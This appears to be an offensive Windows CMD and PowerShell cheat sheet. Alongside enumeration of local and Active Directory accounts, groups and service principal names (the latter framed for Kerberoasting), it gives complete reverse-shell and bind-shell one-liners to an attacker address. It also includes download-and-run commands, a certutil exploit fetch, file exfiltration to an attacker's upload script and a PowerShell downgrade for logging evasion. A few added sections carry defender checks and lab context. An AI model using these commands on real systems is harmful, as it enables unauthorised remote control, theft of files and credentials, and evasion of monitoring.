
CMD & PowerShell

CMD


system

systeminfo
user – enumerate all local accounts
net user
user – enumerate all users in domain
net user /domain
user – details
net user michael_admin /domain
group – all groups in domain
net group /domain
group – details
net group "Tier 1 Admins" /domain
account – password policy
net accounts /domain
file transfer
certutil -urlcache -f http://10.10.10.5/exploit.exe exploit.exe
read file
type flag.txt
show and read alternate data streams
dir /R
more < flag.txt:root.txt:$DATA 
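The same alternate data stream operations from PowerShell, as an added example that is not part of the original page. It wraps stream enumeration in a small helper and also shows the Zone.Identifier stream that browser downloads carry; the file and stream names are the page's own, the helper name is an assumption.

```powershell
# Added example (not from the original page): ADS handling from PowerShell.
# Works on NTFS volumes with PowerShell 3.0 or later.

function Get-FileStreams {
    param([Parameter(Mandatory)] [string] $Path)
    # ':$DATA' is the unnamed main stream; anything else is an alternate stream
    Get-Item -Path $Path -Stream * | ForEach-Object {
        [pscustomobject]@{
            File   = $_.FileName
            Stream = $_.Stream
            Bytes  = $_.Length
            Hidden = ($_.Stream -ne ':$DATA')
        }
    }
}

# Create a file with a hidden stream (cmd equivalent: echo hidden > flag.txt:root.txt)
Set-Content -Path .\flag.txt -Value 'visible content'
Set-Content -Path .\flag.txt -Stream root.txt -Value 'hidden content'

Get-FileStreams -Path .\flag.txt                  # like dir /R: lists :$DATA and root.txt
Get-Content -Path .\flag.txt -Stream root.txt     # like more < flag.txt:root.txt:$DATA

# Browser downloads carry a Zone.Identifier stream (mark-of-the-web) recording the
# source zone/URL; reading it tells you where a file came from, removing it clears the mark
Get-Content -Path .\flag.txt -Stream Zone.Identifier -ErrorAction SilentlyContinue

# Delete only the hidden stream, leaving the main file content in place
Remove-Item -Path .\flag.txt -Stream root.txt
```

Copying a file to a FAT/exFAT volume or through most archive tools silently drops every alternate stream, so anything hidden there does not survive an evidence export done that way.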

PowerShell


downgrade powershell

Several PowerShell engines usually coexist on a host, and an old one that was never removed can still be invoked. Script block logging (event ID 4104, the record of what code actually ran) arrived with PowerShell 5.0 and module logging with 3.0; neither applies to the 2.0 engine, so a shell started with -version 2 leaves far less in Event Viewer while still using only what is built into the host. Two caveats: the 2.0 engine needs .NET Framework 3.5 and is an optional feature that is disabled by default from Windows 10 1709 onward, so the downgrade often does not work on current builds; and the engine start itself is still recorded (event ID 400 in the Windows PowerShell log, with EngineVersion=2.0), which is a well-known detection. Check $PSVersionTable.PSVersion after launching to confirm the downgrade actually took effect.

powershell.exe -version 2
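Checks worth running before relying on a downgrade, and the query a defender uses to spot one, as an added example that is not part of the original page. Run it from an elevated PowerShell 5.1 prompt; the feature and registry names are the real ones, nothing else is assumed.

```powershell
# Added example (not from the original page): is the v2 engine really usable here,
# and what does the downgrade look like from the defender's side?

# 1. Is the optional feature still installed? Off by default on Windows 10 1709+.
#    (On Windows Server use: Get-WindowsFeature PowerShell-V2)
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 |
    Select-Object FeatureName, State

# 2. The v2 engine runs on .NET Framework 3.5; without it the engine cannot start.
Test-Path 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5'

# 3. Confirm which engine the "downgraded" shell is actually running.
powershell.exe -version 2 -NoProfile -Command '$PSVersionTable.PSVersion.ToString()'

# 4. Defender's view: engine start events (ID 400, "Windows PowerShell" log) fire for
#    every engine, v2 included, and carry EngineVersion=2.0 and the HostApplication
#    command line, so the downgrade is itself a signal even though 4104 script block
#    events are absent.
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
    Select-Object TimeCreated,
        @{ n = 'HostApplication'; e = { ($_.Message -split "`n" | Select-String 'HostApplication').Line.Trim() } } |
    Format-Table -AutoSize
```

If step 1 reports the feature as Disabled, the -version 2 switch does not give you a v2 engine, and step 3 will print 5.1 (or whatever the default engine is); in that case the downgrade buys nothing and step 4 is the only trace you would have left.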

from cmd to powershell

powershell -ep bypass

reverse shell (1)

Listener (On hacker machine)

nc -nvlp 4444
On target machine
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('11.22.33.44',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

reverse shell (2)

Source of ps1 scripts

sudo git clone https://github.com/samratashok/nishang /opt/nishang
listener (On hacker machine)
nc -nvlp 4444
serve the script over HTTP on port 8000 on the hacker machine (Invoke-PowerShellTcp.ps1 lives in nishang's Shells directory)
On target machine
powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444

bind Shell

setup listener on windows box

powershell -c "$l = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$l.start();$client = $l.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$l.Stop()"
on Kali Linux, connect to the listener
nc -nv 11.22.33.44 4444

run application

Start-Process notepad.exe

search command

Get-command get-*ip*

list files

Get-Childitem -Path C:\

list hidden files

gci -force

Get-Childitem -Path C:\ -Recurse -force -Include *.txt
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*
Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue

read file

more password.txt
type password.txt
cat password.txt
get-content .\password.txt

present data

get-process | out-gridview
get-hotfix | out-gridview

save into file

get-hotfix | out-file hotfix.txt

copy and move file

copy-item password.txt password_copy.txt
move-item password.txt password_copy.txt

download file

(New-Object System.Net.WebClient).DownloadFile("http://<IP>/shell.exe","C:/windows/temp/shell.exe")

download file, but not save

IEX (New-Object System.Net.WebClient).DownloadString('http://<IP>/hello.ps1')

upload file

upload.php (on the hacker web server; the uploads directory must be writable by the web server user)

<?php
// minimal receiver for WebClient.UploadFile: the file arrives in the 'file' form field
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);   // basename keeps the name from escaping the directory
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
(New-Object System.Net.WebClient).UploadFile('http://<ip>/upload.php', 'important.docx')

search by content

Get-ChildItem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue | Select-String -Pattern "connectionString" -ErrorAction SilentlyContinue | Select-Object -Unique Path
Get-ChildItem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue | Select-String -Pattern "SQL01" -ErrorAction SilentlyContinue | Select-Object -Unique Path

show services

get-service
get-service | where-object -property status -eq running
get-service | where-object -property status -eq stopped
Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName

current working directory

get-location

check if file exist

test-path "c:/program files/interesting-files.txt"

get list of users

get-localuser

get list of user with details

get-localuser | select *

get details of user

get-localuser -name Administrator | select *

list local groups

get-localgroup

get IP address

Get-NetIPAddress

get all process

get-process

list scheduled tasks

get-scheduledtask

get owner of

get-acl c:

unzip

Expand-Archive -Path winpeas.zip -DestinationPath .

check .Net version

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP"

file transfers

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/winpeas.bat','C:\Windows\Temp\winpeas.bat')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/powercat.ps1','C:\Windows\Temp\powercat.ps1')"

enumerate patches

get-hotfix
get-hotfix | format-list | findstr InstalledOn

Powershell on Active Directory Domain Controller


enumerate user

get-aduser -Filter *
get-aduser -Filter * -searchBase "CN=Users,DC=THMREDTEAM,DC=COM"
get-aduser -Filter * -searchBase "OU=THM,DC=THMREDTEAM,DC=COM"
get-aduser -Identity gordon.stevens -Server za.tryhackme.com -Properties *
get-aduser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A

enumerate groups

Get-ADGroup -Identity Administrators -Server za.tryhackme.com
Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com

enumerate objects

looking for all AD objects that were changed after a specific date

$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com

enumerate domains

Get-ADDomain -Server za.tryhackme.com

powershell script

error – execution of scripts is disabled on this system

Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Without -Scope this changes the LocalMachine policy and needs an elevated prompt; -Scope Process Bypass changes nothing on disk and is gone when the shell exits. The execution policy is a safety rail, not a security boundary, which is why powershell -ep bypass works without any privilege.
get domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

script → get users

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name          # primary domain controller, the authoritative LDAP target

# build LDAP://<PDC>/DC=<domain>,DC=<tld> from the domain name
$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$searchStr

$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry   # default naming context of the joined domain
$searcher.SearchRoot = $objDomain                                  # replaces the root set above; both are the domain root

$searcher.filter = "samAccountType=805306368"   # 805306368 = normal user accounts
$items = $searcher.FindAll()

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        $prop.name    # print only the name attribute; use $prop alone to dump every attribute
    }
    Write-Host "-------------------------"
}

script → get groups

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name

$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$searchStr

$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$searcher.SearchRoot = $objDomain

$searcher.filter = "(objectClass=group)"
$items = $searcher.FindAll()

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        $prop.name
        $prop.member    # multi-valued: one DN per group member
    }
    Write-Host "-------------------------"
}

script → get serviceprincipalname

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name

$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$searchStr

$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$searcher.SearchRoot = $objDomain

$searcher.filter = "serviceprincipalname=*http*"   # any object whose SPN mentions http
$items = $searcher.FindAll()

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        $prop    # dump every attribute of the match
    }
    Write-Host "-------------------------"
}
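One reusable search that covers the three scripts above (users, groups, service principal names), as an added example that is not the page's own code. It differs from them in two ways a practitioner cares about: the search root actually points at the PDC (the scripts build $searchStr and then override it), and paging is enabled, because without PageSize a domain controller caps a result set at 1000 entries and larger domains are silently truncated. The function name, the sample OU and the choice of attributes are assumptions; it needs a domain-joined host or a session started with domain credentials.

```powershell
# Added example (not from the original page): paged LDAP search via DirectorySearcher.

function Invoke-LdapSearch {
    param(
        [Parameter(Mandatory)] [string] $Filter,
        [string[]] $Properties = @('samaccountname'),
        [string]   $SearchBase              # optional DN, e.g. OU=THM,DC=THMREDTEAM,DC=COM (assumed)
    )
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    $pdc    = $domain.PdcRoleOwner.Name
    if (-not $SearchBase) {
        # DC=corp,DC=local style root built from the DNS domain name
        $SearchBase = 'DC=' + $domain.Name.Replace('.', ',DC=')
    }
    $root     = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$pdc/$SearchBase")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, $Filter)
    $searcher.PageSize = 1000                 # paged results; otherwise rows beyond 1000 are dropped
    $searcher.PropertiesToLoad.AddRange($Properties)

    foreach ($result in $searcher.FindAll()) {
        $row = [ordered]@{}
        foreach ($p in $Properties) {
            # multi-valued attributes (member, serviceprincipalname, memberof) come back as a collection
            $row[$p] = @($result.Properties[$p]) -join '; '
        }
        [pscustomobject]$row
    }
}

# Users: samAccountType 805306368 = normal user accounts (the page's filter)
Invoke-LdapSearch -Filter '(samAccountType=805306368)' -Properties samaccountname, pwdlastset, memberof

# Groups with their members
Invoke-LdapSearch -Filter '(objectClass=group)' -Properties samaccountname, member

# The page's SPN filter, narrowed to user accounts (machine accounts always have SPNs)
# and excluding krbtgt: every row is a service account whose ticket can be requested
Invoke-LdapSearch -Filter '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(samAccountName=krbtgt)))' `
                  -Properties samaccountname, serviceprincipalname
```

Attribute names are matched case-insensitively by the server but the result collection is keyed in lowercase, which is why the examples pass them that way; pwdlastset comes back as a raw FILETIME integer and can be converted with [datetime]::FromFileTime().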